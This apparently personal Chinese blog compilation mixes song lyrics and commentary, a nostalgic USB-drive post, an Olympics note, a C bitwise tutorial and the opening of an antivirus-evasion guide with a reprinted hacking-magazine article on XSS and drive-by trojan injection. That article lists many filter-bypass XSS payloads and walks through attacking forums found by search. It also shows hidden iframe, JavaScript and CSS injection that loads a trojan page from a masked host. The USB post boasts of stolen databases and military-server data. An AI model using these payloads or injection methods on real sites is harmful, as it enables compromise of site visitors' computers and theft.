When I am down and, oh my soul, so weary; 我失落，哦，我的灵魂疲倦； When troubles come and my heart burdened be; 困难来临，我心负一切重担； Then, I am still and wait here in the silence, 然而我，仍在寂静中等待； Until you come and sit awhile with me. 直到你来，并陪我稍坐缠绵； You raise me up, so I can stand on mountains; 使我奋进，我才立于群山之颠； You raise me up, to walk on stormy seas; 你鼓舞我，我穿过海浪风雨； I am strong, when I am on your shoulders; 我坚强，是因为倚靠你的肩膀； You raise me up… To more than I can be. 你鼓舞我…让我超越自己；   You raise me up, so I can stand on mountains; 使我奋进，我才立于群山之颠； You raise me up, to walk on stormy seas; 你鼓舞我，我穿过海浪风雨； I am strong, when I am on your shoulders; 我坚强，是因为倚靠你的肩膀； You raise me up… To more than I can be. 你鼓舞我…让我超越自己；   ****************歌中没有**************** There is no life – no life without its hunger; Each restless heart beats so imperfectly; But when you come and I am filled with wonder, Sometimes, I think I glimpse eternity. ****************歌中没有**************** You raise me up, so I can stand on mountains; 使我奋进，我才立于群山之颠； You raise me up, to walk on stormy seas; 你鼓舞我，我穿过海浪风雨； I am strong, when I am on your shoulders; 我坚强，是因为倚靠你的肩膀； You raise me up… To more than I can be. 你鼓舞我…让我超越自己； You raise me up, so I can stand on mountains; 使我奋进，我才立于群山之颠； You raise me up, to walk on stormy seas; 你鼓舞我，我穿过海浪风雨； I am strong, when I am on your shoulders; 我坚强，是因为倚靠你的肩膀； You raise me up… To more than I can be. 你鼓舞我…让我超越自己； You raise me up… To more than I can be. 你鼓舞我…让我超越自己；

每当我悲伤沮丧时，噢，心儿是如此倦怠难言 每当烦扰袭临时，心哦，总是沉重不堪 孤寂中，我静静等待 等您出现 与我稍坐倾谈     您鼓舞了我 我才立于群山之颠 您鼓舞了我 让我行过风雨海浪 倚在您肩头 我变得无比强壮 您鼓舞了我 让我超越自我     您鼓舞了我 我才立于群山之颠 您鼓舞了我 让我行过风雨海浪 倚在您肩头 我变得无比强壮 您鼓舞了我 让我超越自我     所有的生命 都蕴藏着欲望和不安 躁动的心哦 难以激荡完美的乐章 但是，当您来到我身旁 心哦，自此感受到神奇 有时我想，我已捕捉到永恒之光   您鼓舞了我 我才立于群山之颠 您鼓舞了我 让我行过风雨海浪 倚在您肩头 我变得无比强壮 您鼓舞了我 让我超越自我

       常常这样想，爱神伟力的极限是什么？不止是良师，不止是益友，亦不止是父母的慈爱和情人的关怀，“爱”或许可以达到这样一种境界--无语的眼神、无言的陪伴，可以熨平对方心中的失落、忧伤甚或躁动不安的情结，构成其心灵深处最为坚实、最为可靠、最为平和的支撑力。在歌曲“You raise me up”中，我们似乎可以捕捉到这种神奇之爱的光芒所在--因为您的存在，您的鼓励，我才能立于群山之颠、才能踏过风雨海浪、才能不断超越自我、才能让心灵感受永恒和完美……

       歌词本身的另一亮点在于感恩的心境，听完这首仿佛隔世的天籁声韵，心灵深处可以再次领悟由于感恩而自身言传的快乐和祥和。因为感恩，我才能感受到“您”的鼓励以及自身受之于鼓励后的意义，这或许就是生命个体追寻幸福的万能锁匙。

      据说，这首歌本是献给母亲的歌，也有人解读为上帝之爱，尤其是歌词后半部分--所有的生命，都蕴藏着欲望和不安……但是，当您来到我身旁，心哦，自此感受到神奇，有时我想，我已捕捉到永恒之光，与泰戈尔那首歌咏心中神明的《吉檀迦利》具有异曲同工之处：“我的欲望很多，我的哭泣也很可怜，但你永远用坚决的拒绝来拯救我，……。你使我一天一天地更配领受你自动的简单伟大的赐予--这天空和光明，这躯体和生命与心灵--把我从极欲的危险中拯救了出来……”       

                                                                                                                                       -----陈蓓编辑

题记：她今天终于完成了使命，永远的离开了我………… 为表纪念，发几张她照片上来。

      记得当时我才高一，不知道为什么突然想买一个U盘，于是用了过年几乎所有可支配的压岁钱买了一个爱国者的128MB迷你王U盘，USB1.1接口，银白色，刚买回来的时候非常兴奋！感觉这200多元花的太值了，但是如果我当时知道现在一个8GB的才198元的话，估计会吐血身亡的……

       毫不夸张地说，是这个U盘陪伴我走过了高中时的“峥嵘岁月”，她就像是我的钥匙链，天天挂在身上！里面保存着一些常用的工具与一些小视频，由于我们当时是液晶投影教学，所以老师一拿笔记本过来同学们就叫我去放视频，有一阵子我这天天的一小段视频都成了课余必备的娱乐项目了……

       除此之外，她还承载着我电脑的希望，可以说如果没有这个U盘，就没有今天我对电脑的痴迷！这128MB的空间里承载过老师的重要资料、承载过全班同学的档案，还承载过我们城市里数个网吧的会员数据库！除此之外，她还承载过我在美军服务器搞回来的东西，而且由于高中时我家里一直没有上网，她更是承载过数次杀毒软件的更新病毒库……

       可以说我高中的三年几乎与她形影不离，由于天天带在身上，所以也磨去了棱角……

       也因此不止一次洗裤子时忘记将她取下来，放到洗衣机里历练了数回，但是她不但没有罢工，连数据都没丢！

       然而就在今天，当我想起她时，她终于义无反顾的倒下了，陪伴了我3年的U盘今天将离我而去，但是我是不会忘记她的！谨以此贴献给陪伴我3年的U盘……

       带着我3年体温的U盘……

后面的SN是SIG647045163215

外壳已经磨损的不成样子了。

由Flash芯片上的信息可知，这是东芝的Flash闪存，于04年4月8日在台湾生产。

最后还要再组合好好好保存之……

题记：百年奥运，百年梦想，中国这条巨龙正在腾飞！

       从前几日的法国表态出席奥运会并拒绝与达赖见面的现象看来，中国的外交已经初步走出韬光养晦的阶段，并历史性的争取了主动权。

       虽说奥运与政治不应沾边，但是每一个智力正常的人都已经注意到了国内国外都给予了奥运过多的“任务”与负担。有许多人都想借着奥运做些什么……

       闲话少说，本想长篇大论一番，眼看奥运开幕式就要开始了，先写到这里吧……

       祝北京奥运成功！！

题记：这是我在《黑客X档案》08年第5期发表的一篇文章，对跨站与挂马做了比较全面而深入的讲解。

转载请注明版权：http://a1pass.blog.163.com/   A1Pass   《黑客X档案》

 现在的黑客攻击手法中，跨站挂马似乎正在逐渐成为攻击的主流话题，鉴于这种形势，俺就把我学习跨站挂马的一点心得总结出来与大家分享。

由于考虑到知识的认知过程以及入门朋友们的技术底子问题，本文将分为“基础知识”、“跨站漏洞”与“挂马技巧”三部分组成，咱们先来学习一下基础知识，以及跨站攻击的利用方法。

一、基础知识

1、什么是UBB码

XSS攻击主要在两种环境下进行，一个是用户自己构造的比标签，构造者汇总标签要严格遵循HTML标记语言，而UBB码是HTML的一个变种，属于系统提供的标签。UBB代码简单，功能很少，但是由于其TAG语法检查实现非常容易，所以许多网站引用了这种代码，以方便广大网友的使用，当然，同时也为我们打开了方便之门。

下面我列出几个例子，以便大家对UBB码有一个感性的认识。

显示为粗体效果：[B]文字[/B]

显示为斜体效果：[I]文字[/I]

显示文字的超链接：[URL= http://www.hackerxfiles.net/]黑客X档案官方站[/ URL]

通过上面的例子，我们可以看出来UBB码用的是中括号标签“[”与“]”。

为什么介绍这些？因为关键时候，我们借助UBB码也可以达到跨站的效果。

2、什么是HTML输入

大家看到这的时候，有条件的可以打开X档案的网站看看，我们在IE浏览器的页面中单击右键，选择“察看源文件（V）”选项，如图1。

然后就会弹出如图2那样一个以首页文件命名的记事本。

我们可以看见里面的代码都是用“<”与“>”括起来的，而这个“<”与“>”分别就是HTML的开始与结束标记。例如我们输入<Script>alert(“text”)< /Script>就是输入了一段HTML码，我们可以看见这段代码被“<”与“>”分成了两个标签，分别是<Script>与< /Script >，中间的则是这个标签需要解释的内容，关于这段HTML码的意义，我在下面会为大家解释清楚，大家不要急，更不要怕！

其实基础的跨站应用无非就是几个步骤的问题，要比SQL注入简单多了！在这篇文章中我争取从实用角度出发，从而让大家从啥都不懂，到能自主实战，但是前提是你仔细的读过本文。

二、什么是跨站漏洞

所谓的跨站漏洞，就是一种往数据库里插入特定恶意代码的一种攻击技术，它被称为“XSS”或“CSS”，懂网页设计的朋友可能会困惑，CSS不是层叠式样式表的简称吗？没错，只不过是重名而已，因为跨站攻击的英文是Cross-Site Scripting，所以简称为CSS。但是为了与层叠式样式表区分，现在普遍叫做XSS。那么XSS为什么会被称作为跨站攻击呢？这是因为黑客通过别人的网站脚本漏洞达到攻击的效果，就是说可以隐藏攻击者的身份，因此叫做跨站攻击。其实“Cross-Site Scripting（跨站点脚本）”在意义上来讲是属于错误的名字，因为XSS攻击与脚本基本无关不说，甚至根本不一定是跨站点的。但是这在刚刚发现这种攻击手法时就起了这样一个名字，所以沿用至今，大家也就只能接受了。

对于受到XSS攻击的服务器来说，被插入恶意代码的WEB程序会永久的储存这些代码，除非人为的删掉它！当有人访问这个WEB程序下的某个页面时，恶意代码就会混杂在正常的代码中发送给浏览者，从而导致浏览器执行相应代码，因此达到黑客的攻击目的。

一般情况下来讲，人机交互比较高的WEB程序更容易受到XSS攻击，比如论坛、留言板与带有评论功能的新闻系统等等。而当黑客成功插入相关恶意代码时，那么他就可以挂马、获取管理员的登陆Cookie、强制执行操作甚至格式化浏览者的磁盘（不过用IE6.0的朋友不用担心硬盘被格式化，因为IE6.0的默认安全规则会阻止这些危险动作的发生）！只要是脚本能够实现的功能，跨站攻击同样能达到，因此XSS攻击的危害程度甚至与溢出攻击都是不相上下！

三、跨站攻击的原理

其实， XSS攻击的本质还是注入的问题，只不过XSS攻击注入的是恶意的HTML脚本而已。但是这些注入的恶意代码为什么会被执行呢？这其实是由于浏览器的不足造成的。

因为浏览器在接受数据时，他无法辨认哪些是应该解释的代码，哪些是不需要解释的数据。如果是数据，浏览器完全可以简单的将其显示出来即可，但可悲的是浏览器做不到这点，只要碰到符合条件的标记，他就会将其解释执行，从而给我们XSS攻击埋下伏笔。

所以如果WEB程序在接受数据时如果不做有效的过滤，就会导致恶意代码进入数据库，而且我们注入的JavaScript代码可以在安全策略准许的范围内执行任何操作，如果这段JavaScript代码可以让对方的电脑下载并执行你的木马时，这就是我们所说的“挂马”了。

归根结底，跨站攻击的根本漏洞就在WEB程序里，大家可以看看图3。

有助于你进一步理解XSS攻击的含义，我们通过图3可以看出来，如果WEB程序能做跟好的滤，XSS攻击是完全有可能被避免的。

四、跨站攻击的挖掘

知道了XSS攻击的之后，我们怎样才能挖掘网站的XSS漏洞呢？

想挖掘网站的XSS漏洞，我们必须要有基本的脚本底子，鉴于我们叉子的电脑基础问题，这里我就先为大家解释一下标准测试代码<Script>alert(“text”)< /Script>的意思，要注意看哦！其中的text可以改为任何字，如果存在XSS漏洞，我们使用这段代码进行XSS攻击后，浏览相的应页面就会弹出包含text这个字符的提示框，如图4。

而<Script>与< /Script >则分别是脚本开始、结束的HTML标记，alert是JavaScript下的一个显示信息对话框的方法，这个大家知道就行。也就是说，如果跨站成功，这个alert方法就会被执行。因此，我们就可以将alert换成任意的JavaScript代码，那么实现挂马功能自然也就不在话下了。

鉴于XSS攻击的危害性，一般的站点都会将<Script>与< /Script >这样敏感的关键字过滤，那该怎么办？难道我们一开始就被难住了吗？ON！我们当然不能被他们难住，肯定有办法突破的！

但是突破了这个限制，如果碰到别的限制怎么办呢？不要急，今天我就带领大家步步设防，在步步突破！从不断的突破中带领大家学习XSS攻击的大体思路！

那么面对我们的第一道关于<Script>与< /Script >的过滤我们该怎么办呢？

第一步就是看看替换大小写！这替换大小写真可谓万能招数啊……

我们只需将<Script>与< /Script >改为<ScRipT>与< /SCrIPt >或类似的形式即可。如果没通过怎么办？看看下面这个办法。

对于过滤<Script>与< /Script >来说，我们使用HTML标签下就可以绕过，例如：

<img src=javascript:alert(“text-img”) ></img>

它执行后与<Script>alert(“text”)< /Script>结果是一样的，如图5。

通过对比，我们可以知道被执行的是“ alert(“text-img”) ”这段JavaScript代码，而执行JavaScript的标记则变成了“ javascript: ”，这段XSS攻击代码巧妙的利用了<img>标签提供的“<>”号执行了相应的JavaScript代码。

那么，如果我们javascript:也被过滤了的话，那该怎么办呢？呵呵，我们还可以试试部分字符换作ASCII码表示是否可以。对于过滤javascript:来说，我们就将javascript:中的某些字符转换为16进制的值，例如：<img src=”&#106avascript&#58aler(/src-text/) “>，其中的&#106与&#106就是“j”与“:”的16进制。当然我们转换成<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>效果更好些！除此之外，我们还可以将j由&#106;转换成例如&#0000106;也可以。

具体转换内容大家可以参考ASCII码表：

ASCII	Hx	Oct	Char	ASCII	Hx	Oct	Char	ASCII	Hx	Oct	Char
32	20	040	SPACE	64	40	100	@	96	60	140	`
33	21	041	!	65	41	101	A	97	61	141	a
34	22	042	"	66	42	102	B	98	62	142	b
35	23	043	#	67	43	103	C	99	63	143	c
36	24	044	$	68	44	104	D	100	64	144	d
37	25	045	%	69	45	105	E	101	65	145	e
38	26	046	&	70	46	106	F	102	66	146	f
39	27	047	'	71	47	107	G	103	67	147	g
40	28	050	(	72	48	110	H	104	68	150	h
41	29	051	)	73	49	111	I	105	69	151	i
42	2A	052	*	74	4A	112	J	106	6A	152	j
43	2B	053	+	75	4B	113	K	107	6B	153	k
44	2C	054	,	76	4C	114	L	108	6C	154	l
45	2D	055	-	77	4D	115	M	109	6D	155	m
46	2E	056	.	78	4E	116	N	110	6E	156	n
47	2F	057	/	79	4F	117	O	111	6F	157	o
48	30	060	0	80	50	120	P	112	70	160	p
49	31	061	1	81	51	121	Q	113	71	161	q
50	32	062	2	82	52	122	R	114	72	162	r
51	33	063	3	83	53	123	S	115	73	163	s
52	34	064	4	84	54	124	T	116	74	164	t
53	35	065	5	85	55	125	U	117	75	165	u
54	36	066	6	86	56	126	V	118	76	166	v
55	37	067	7	87	57	127	W	119	77	167	w
56	38	070	8	88	58	130	X	120	78	170	x
57	39	071	9	89	59	131	Y	121	79	171	y
58	3A	072	:	90	5A	132	Z	122	7A	172	z
59	3B	073	;	91	5B	133	[	123	7B	173	{
60	3C	074	<	92	5C	134	\	124	7C	174
61	3D	075	=	93	5D	135	]	125	7D	175	}
62	3E	076	>	94	5E	136	^	126	7E	176	~
63	3F	077	?	95	5F	137	_	127	7F	177	DEL

但是如果对方又过滤了“&”号或“#”号该怎么办呢？ 我们可以试试下面这条XSS攻击测试代码：

<img src=javascr      ipt:alert(“text-img”) ></img>

看到了没有？中间的一个[Tab]键弄出来的空白（这个空白叫做制表符）即可绕过这类过滤，呵呵！除此之外以下几个XSS攻击代码也可以绕过这种过滤。

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

当然，如果仅仅是过滤掉javascript:的话，我们其实还有一个非常简单的方法，不用javascript脚本！别忘了微软还为我们准备了VBScript啊！我们将代码简单的换成<IMG SRC='vbscript:msgbox("XSS")'>即可。

而如果对方过滤了“SRC”的话怎么办呢？呵呵！不急！我们还可以利用下面的XSS攻击代码绕过这种过滤，效果与利用SRC基本一致。

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

然而随着XSS攻击的频繁发生，程序员们都开始想着怎样避免漏洞的出现，于是他们过滤了制表符这类部常见的符号，过滤空格还过滤了javascript。

但是聪明的我们还可以利用事件和属性替换掉关键字，绕过监测，比如：

<img src="#" onerror=alert(/error-text/) >

由于HTML的脚本默认就是JavaScript，因此即便是我们不特别的声明，其中的alert(/error-text/)还是可以顺利执行，而它的执行利用的是错误事件onerror才得以完成的。有的初学朋友可能会头晕了，什么事件啊属性啊什么的，我不懂啊！呵呵，不要着急，对于初学的朋友，你只要记住其中的alert(/error-text/)可以换成其他JavaScript代码就可以了。

但是有的初学者不明白了，我们知道这些又有什么用呢？你可以将其换成<img src="#" onerror=document.write('http:\/\/a1pass.blog.163.com\/') >来实现挂马功能。而且到后期当你懂得一定的脚本知识时，你可以用它做更多的事。

哦，原来利用事件也能跨站，所以有的人又开始过滤事件，以使我们的onerror事件无法执行。但是“山穷水尽疑无路，柳暗花明又一村”，总使你过滤再多的事件，如果我自己构造一个呢？下面这段代码就是我构造的一个叫做“A1Pass”的事件，它的执行结果与通过onerror来执行JavaScript代码的结果是一样的。

<img src="#" style="A1Pass:expression(alert(/style -text/));">

执行结果如图6所示。

我们甚至不要SRC并且脱离<img>标签都可以成功进行XSS攻击！例如下面那段XSS测试代码。

< DIV style="A1Pass:expression(alert(/style -text/));">

值得注意的是，通过style构造的事件会执行两次，而且当鼠标移过时也会再次触发style事件。

当然除此之外我们还可以利用其他未被过滤的事件，或者利用上面所说的制表符（Tab键）来分割被过滤的关键字，除此之外注释符号“/**/”也可以当作空格来用，例如：

< img src="#"/**/onerror=alert(/error-text/) >

讲到这里有的朋友可能已经按耐不住了，那我们应该怎样去挖掘这些漏洞呢？我可以很负责任的告诉你，在你理解这些XSS攻击方法的前提下，挖掘这些漏洞就显得比较简单了，我们下面进行一次XSS攻击的实验。

大家都知道，可以输入信息的地方才有可能构成XSS攻击，但是选择一个输入点的好坏直接关系到XSS攻击的威力与成功几率。

我们先从威力方面考虑，当然是用户浏览次数越多，交互越频繁的地方，你进行XSS攻击后的效果就越明显，就拿论坛来说，用户头像、签名等都是比较高效而且较易成功的XSS攻击点。

下面我们就拿一个动网论坛做一下实验。

第一步先在网上找一个动网论坛，关键字是POWERED BY DVBBS ，大家自己搜吧。找到后先查看自己的权限，因为我们要利用自定义头像进行XSS攻击，所以为了能自定义头像，我这里需要先发10篇帖子……

第二步开始验测，我们在动网“自定义头像地址：”中输入我们的XSS测试代码<script>alert(“text”)< /script>，然后点击保存。

但是我们刷新后并没有看到text弹出来啊！如图7，怎么办？首先我们在返回的页面信息中可以看到完整的XSS测试代码<script>alert(“text”)< /script>，这至少证明没有被过滤。

小技巧：如果我们在某一个页面提交完XSS代码，刷新后还能显示的话（例如完整显示<script>），那大多数的情况是这个站点存在XSS漏洞！只是还需要我们进一步去挖掘。

但是他为什么没有顺利执行呢？这时就需要我们察看网页的源代码了，我们在IE浏览器的页面中单击右键，选择“察看源文件（V）”选项，即可看到这个页面的HTML源代码，按[Ctrl]+[F]快捷键调出查找对话框，输入alert(“text”)后我们找到了如下代码：

<a href="#" onclick="openScript('smiley.asp?t=1',650,400)" title="头像预览列表">[<font color="#FF0000">头像预览</font>]</a></td>

<td width="180" rowspan="2" valign="top" align="center">

<img id="face" src="<script>alert(“text”)< /script>" width="120" height="120" />

</td></tr>

大家可以看到我们的XSS测试代码确实没有被过滤，但是被<img>标签的“< >”给包围了，当然就不能执行了！我们怎么办呢？

这里给大家一个思路：逆向思考！我们怎样不被包围呢？呵呵！大家看看下面这段新构造的XSS测试代码。

><script>alert(“text”)< /script><

当我们输入这段代码后，原先闭合的<img>标签被我们拆分为<img id="face" src="><script>alert(“text”)< /script><" width="120" height="120" />

也就是变成<img id="face" src=">、<script>alert(“text”)</script>、<"width="120" height="120" />三个单独的语句，我们可爱的<script>alert(“text”)< /script>就这样被我们解围了。

关于XSS攻击其实是没有定律的，就拿我们绕过验证方法来看，除了上面的其实还有许多许多！随着你脚本底子的增加，你会发现更多的XSS攻击代码！但是我最后要说的就是一定要注意到浏览器的存在！

在本小结的最后我为大家附上一些针对不同浏览器可以成功执行的XSS攻击代码，希望能给大家一些启示。

<a href="javascript#[code]">

<div onmouseover="[code]">

<img src="javascript:[code]">

<img tdynsrc="javascript;[code]">   [IE浏览器]

<input type="imge" dynsrc="javascript;[code]">   [IE浏览器]

<bagsound src="javascript;[code]">   [IE浏览器]

&<script>[code]</script>

&{[code]}   [N4浏览器]

<img src=&{[code]};>

<link rel="stylesheet" herf="javascript;[code]">

<iframe src="vbscript:[code]">   [IE浏览器]

<img src="mocha:[code]">   [N4浏览器]

<img src="livescript:[code]">   [N4浏览器]

<div style="behaviour:url([link to code])">   [IE浏览器]

<div style="binding:url([link to code])">   [Mozilla浏览器]

<div style="width:expression([code]);">   [IE浏览器]

<object classid="clsid:..." codebase="javascript:[code]">   [IE浏览器]

[\xCO][\xBC]script>[code][\xCO][\xBC]/script>   [UTF-8;IE;Opera浏览器]

上面的内容是我参考安全焦点出版的《网络渗透技术》做的摘录。

五、挂马技术

对于挂马，强烈要求大家带着学习的目的去钻研，不要拿出去害自己的同胞……

1、什么是挂马

最近看中央电视台的一个有关于黑客的节目，字幕上竟然把“挂马”显示成“挂码”！估计是对黑客技术不了解所致。但是也可以看得出来大家对于挂马技术的陌生。

其实通过名字就可以知道一二，挂马就是指一种将木马程序“挂”到大家比较信赖的网站上，从而使得浏览此网站的网民电脑被非法植入木马的行为。

如果挂马技术比较成熟，被挂马的网站服务人员与浏览此网站的网民一般很难察觉！所以说挂马具有隐藏性好，危害巨大的特点，大家试想一下，如果百度首页被挂马，那么后果会怎样？只需1天就会有上千万人的电脑被非法控制！

2、挂马的原理

关于挂马技术，与XSS基本一致，但貌似比XSS技术的门槛低。而就夸马的方式来说，一个是通过漏洞挂马（例如XSS），一个是通过拥有的绝对权限挂马，例如我们利用WEBShell进行批量挂马。但是不管是利用什么方法，只有我们有良好的挂马代码才会获得比较好的效果……

挂马的基本思想就是利用本地溢出漏洞构造下载执行的ShellCode，从而下载并执行指定的程序，如图8。

关于溢出漏洞，可以是IE本身存在的漏洞，可以是与IE有联系的漏洞，例如WORD、FILASH、WMA音频等等。

3、挂马实战

挂马于XSS一样，都有一个“基本代码”，而挂马的基本代码则是:

<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>

通过上面的学习，相信入门的朋友对HTML已经有点了解了吧？我们可以看到这是一个包含< ifarme>标签的代码，< ifarme>标签是用来在网页内嵌入另一个页面的，如图9就是一嵌入页面。

通过代码我们很容易就能知道他嵌入的是一个宽[width]为500像素，高[height]为100像素的页面，通过对比，我们可以发现本文例子的宽和高都是0，这就起到了隐藏访问木马网页的目的。

但是现在稍微有点安全常识的人都知道查找关键字ifarme了，所以要实行有效的挂马，最好是使用其它的挂马技巧。而另外一个常用的方法就是JS挂马了，这里的JS和我们上面谈到的JavaScript一样，JS挂马当然是先创建JS文件，我们先建一个记事本，将以下代码输入到里面。

Top.document.body.innerHTML = top.document.body.innerHTML +’\r\n<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>’;

然后依次选择“文件”>“另存为(A)…”保存为.js文件，如图10。将其上传到你所能控制的服务器中。

现在我们只要在那个网页中插入< script  src=http://你的JS文件保存地址></script>，以后只要有人浏览这个页面就会偷偷的转向我们JS文件里的http://www.***.com/muma.htm，从而达到挂马的目的。

这种方法很好的避开了关键字ifarme，只要我们的JS文件的名称起的具有迷惑性，一般的应该都可以蒙混过关。如果还想要更加隐蔽的方式，那就只有使用CSS来挂马了。

通过上面的文章大家应该对CSS有所了解，CSS是层叠式样式表的简称，也就是说我们可以利用层叠式样式表来挂马，熟悉网页设计的都知道，凡是比较复杂漂亮的页面，一般都要用到层叠式样式表，而且层叠式样式表的代码繁杂，从而有效地掩护了我们的挂马代码。

我们只要在CSS文件中包含以下代码即可。

Body{

Hytop: expression(op.document.body.innerHTML = top.document.body.innerHTML +’\r\n<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>’;);

}

然后在我们要挂马的页面引用这个CSS文件就可以了，引用代码如下。

<link href=”css.css” rel=”stylesheet” type=”text/css”>

有了这三种方法撑腰，你的网马挂的应该算是比较成熟了，但是除此之外，我们还有其它比较另类的挂马方法，正可谓剑走偏锋，出其不意！

第一个要介绍的就是“臭要饭的”写的“IcodeToSWF”，它可以将我们的网页木马地址插入到SWF文件里，当别人兴高采烈的观看动画时，他已经成为我们粥中的肉鸡了！

关于IcodeToSWF的使用方法非常简单，我们代开文件后选择需要插马的SWF文件，然后输入我们的目马网址点击“给我插”就可以了，如图11。

最近总是听说网易博客中毒了！一听吓我一大跳！网易的BLOG还没智能到可以运行病毒的程度吧？最后经过调查发现，原来是WMA文件被插了木马！

于是乎淘到了一款傻瓜化的WMA插马工具，我们只需输入木马地址与音乐地址保存即可，如图12。

不过这个工具毛病很多，例如WMA音乐的地址最好手动输入，不要粘贴，否则会出问题……

关于挂马就想讲到这里了，结束前在告诉大家一个技巧，关于HTML文件远程访问时我们可以将后缀名改为其它的，例如http://www.***.com/muma.jpg或http://www.***.com/muma.abcd都可以正常执行！除了HTML文件，JS文件也可以这样随意改动后缀名，甚至无后缀名都可以！

关于挂马，我最后要说的一句话就是“害人终害己”，切记！

到这里文章全部结束了，本想讲的更加详细一些，涉及的更广一些，但是想到憧憧不知的菜鸟们，使我努力将文章难度降低，以便于入门朋友的学习。关于这片文章，入门的朋友们不要看到代码就头大，其实大多数只是改个网址就可以应用的，为了方便广大读者，我已经将本文涉及到的所有应用代码整理初来，详情请见光盘。

由于时间仓促，本文难免有错误之处，还请广大读者指正！我的ID是a1pass，大家可以到X档案的论坛找我。

××××××××××××××××××××××××××××××××××××××

A1Pass后记：这其实是我07年6月写的文章了，但是一直到08年5月才发表，不过个人认为里面还是有一些东西值得各位读者去学习的。

转载请注明版权：http://a1pass.blog.163.com/   A1Pass   《黑客X档案》

题记：前几个月我们班班长跟我说她对位运算还是不太明白，叫俺给讲讲，于是有了下文……

【以下为大致意思】

班长：“唉～～这C语言可真难，你说这可怎么办？” <--学呗……

我   ：“” <--当时正忙到紧要关头，没回复。

班长：“今天老师讲的位运算不知道你会不？你都没来听课，肯定早就会了……”

我   ：“你没听懂？”

班长：“恩！这可怎么办呀，急死了！你能给我讲讲吗……”

我   ：“我过会在网上给你传点东西，你看完了就明白了，现在我们宿舍有人睡觉，咱们先别发短信了。”

           晚上没事了，一时兴起，全屏个人感觉写出下文，发到博客前我又整理了下格式，希望对刚刚学C的朋友有用……

按位与 &

0&0=0  0&1=0  1&0=0  1&1=1

例如：
   00000011
&  00000101
------------
   00000001

解释：“与”即为连带关系，例如某人与某人，某物与某物。

假如我说一句话“小猫与小狗是动物”，这句话是对的。
假如我说一句话“小明与小狗是动物”，这句话就是错的，因为小明是人类。

///////////////////////////////////////////////////////////////

按位或 |

0|0=0  0|1=1  1|0=1  1|1=1

例如：
   00000011
|  00000101
------------
   00000111

解释：“或”即为选择关系。例如向左走或向右走，吃饭或睡觉。

假如我说一句话“小明或小狗是人类”，这句话是对的。
假如我说一句话“小猫或小狗是人类”，这句话就是错的，因为这里根本没有人类。

///////////////////////////////////////////////////////////////

异或 ^

0^0=0  0^1=1  1^0=1  1^1=0

例如：
   00000011
^  00000101
------------
   00000110

解释：“异或”即为有限定的选择关系。例如走路异或是坐车，用钢笔异或是用铅笔。

语境：这个面包谁偷吃了？
假如我的回答为“小明异或是小狗”，这句话是对的。
假如我的回答为“小明异或是小明”，这句话是错的，因为作为“小明”的只有一个对象。

那么怎样的情况下第二句话才正确呢？就是同时有两个叫做“小明”的孩子。

///////////////////////////////////////////////////////////////

取反 ~

~0=1  ~1=0

例如：
   00000011
~
------------
   11111100

解释：“取反”即为取得相反目的的行为。例如将“生”取反即为“死”，这个就不用解释了吧？

///////////////////////////////////////////////////////////////

左移运算符 <<

高位溢出，低位补0

例如：
             <<1      <<2
01000000  10000000  00000000
01111111  11111110  11111100

解释：由于系统底层读取数据是按照由低地址到高地址读取，例如010011的读取顺序为1>1>0>0>1>0，而当将其向左移位后，计算机要新开辟一个BIT的空间将其补够8位，又因为计算机开辟新空间的初始状态下都为0，所以就造成了向左位移时用0补齐的情况。

///////////////////////////////////////////////////////////////

右移运算符 >>

高位不定，低位溢出

例如：
             >>1      >>2
01000000  00100000  00010000
01111111  00111111  00011111

10000111  11000011  11100001
10111000  11011100  11101110

解释：我上面的例子是针对咱们的教科书，实际情况是根据计算机CPU的不同，右移的结果也不尽相同，有的就像上面那样，如果右移前符号位为负数（就是第一位为1），那么为了保证结果的可操纵性，不足的高位仍然用1补齐，这样可保证右移后的数符号不会发生变化。有的则不会那么负责，直接用默认的初始BIT将其补齐，也就是都用0补齐了。

题记：这是我一年前应邀为《黑客X档案》07年合订本的小手册写的文章，很适合初学的朋友，高手飘过……

转载请注明版权：http://a1pass.blog.163.com/ 与 《黑客X档案》

作者：A1Pass

    大家好，今天我带领大家学习一些关于木马免杀的相关入门知识。本篇文章的主要目的就是带领那些想学习免杀技术的朋友进入这个神秘领域，使大家读完这篇文章后可以将自身技术水平提高一个层次。但是俗话说得好：‘师傅领进门，修行在个人’，所以这里我讲的一些免杀方法他的免杀效果可能不是很好。因为是带领初学者入门，所以讲的主要是免杀思路与一些免杀工具的使用技巧，但是我会在文章结尾介绍一下主流的免杀思路，以便于各位刚刚入门的朋友自学与提高。

    提起免杀，我们不得不说说杀毒软件的杀毒原理，知己知彼，才能百战百胜吗！让我们先一起看看我们的木马是怎么被杀的吧。

一.杀毒原理

通常，一个病毒防御工作者拿到一个截获或上报上来的病毒时，首先是分析这个病毒文件执行后的动作，所谓“动作”，就是指病毒文件执行后会做哪些操作。例如会生成什么新文件、怎样更改注册表、怎样注册服务、打开什么端口等等。

搞明白这些后，下一步一般会研究这个病毒的文件结构，然后找出与众不同的地方，将其定义为特征码。用这种方式定义出来的特征码叫做文件特征码。由于文件特征码都存储在硬盘的文件里，所以我们做免杀时只要将未运行的文件做一下处理就可以了。我们黑客把这种针对文件特征码的免杀工作叫做“文件免杀”。

特征码还有一个分支，即内存特征码。所谓内存特征码就是指木马文件运行后释放到内存时所存在的特征字符串，它的原理大体与上面介绍的文件特征码一样。而针对内存的免杀方法叫做“内存免杀”，另外还有例如启发式验测、主动防御等等都是我们现在涉及不到的。

然而当特征码定义出来之后，它就会被提交到另外的一个部门，然后进入病毒定义库，当用户更新后，以后杀毒软件在碰到符合要求的文件时就会将其毫不忧郁的杀掉！也就是说，杀毒软件只认特征码，不认文件。杀毒软件就像恐怖片里的僵尸一样，只会闻呼吸的气味，眼睛看不到东西，所以影片主角只要带个氧气瓶后僵尸就找不到他了。由此可见，只要我们把其中的特征字符改掉后杀毒软件就不会查杀我们的木马了。怎么改呢？往下看……

二．免杀技巧

